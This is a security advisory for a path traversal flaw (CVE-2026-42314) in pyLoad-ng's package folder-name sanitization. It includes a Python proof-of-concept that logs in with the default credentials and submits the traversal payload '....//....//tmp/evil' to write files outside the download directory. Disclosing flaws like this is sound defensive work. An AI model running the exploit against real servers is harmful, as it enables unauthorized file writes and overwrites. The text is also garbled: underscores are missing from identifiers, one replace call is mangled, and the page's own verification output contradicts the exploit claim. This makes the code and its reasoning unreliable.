PT-2026-37263 · Pypi · Pyload-Ng
Published
2026-05-05
·
Updated
2026-05-05
·
CVE-2026-42314
CVSS v3.1
6.5
Medium
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
Insufficient sanitization of package folder names allows writing files outside the intended download directory.
Affected Component
src/pyload/core/api/ init .py- Function:
add package()
Description
Package folder names are sanitized using insufficient string replacement:
folder = (
folder.replace("http://", "")
.replace("https://", "")
.replace("../", " ") # Bypassable!
.replace("..", " ")
.replace(":", "")
.replace("/", " ")
.replace("", " ")
)The
../ replacement is bypassable. The pattern ....// becomes .. after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.Proof of Concept
Setup
pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyloadExploit
#!/usr/bin/env python3
import requests
BASE URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"
session = requests.Session()
# Login
session.post(f"{BASE URL}/login", data={
"username": USERNAME,
"password": PASSWORD
})
# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After sanitization: .. (still contains ..)
folder payload = "....//....//....//tmp/evil"
resp = session.post(f"{BASE URL}/api/add package", json={
"name": "test package",
"links": ["http://example.com/file.txt"],
"dest": 1 # Destination.QUEUE
})
package id = resp.json()
print(f"Created package: {package id}")
# Set malicious folder name
resp = session.post(f"{BASE URL}/api/set package data", json={
"package id": package id,
"data": {"folder": folder payload}
})
print(f"Set folder payload: {folder payload}")
print(f"Response: {resp.status code}")
# When download occurs, files will be written outside download dir
print("[+] When a file is downloaded, it will be written to manipulated path")
print(" The sanitized folder still contains '..' sequences that OS resolves")Verification
Check where files would be written:
import os
download dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"
# Simulate pyLoad's sanitization
sanitized = folder.replace("../", " ").replace("/", " ")
print(f"After pyLoad sanitization: {sanitized}")
# Output: .. .. .. tmp evil
# When pyLoad does os.path.join and then opens the file:
final path = os.path.join(download dir, sanitized)
print(f"Joined path: {final path}")
# Output: /home/user/Downloads/.. .. .. tmp evil
# The .. sequences remain and could be resolved by OS during file operationsImpact
Authenticated users with ADD permission can:
- Write files outside the download directory
- Potentially overwrite system files (depending on permissions)
- Clutter system directories with downloaded content
Fix
Path traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Pyload-Ng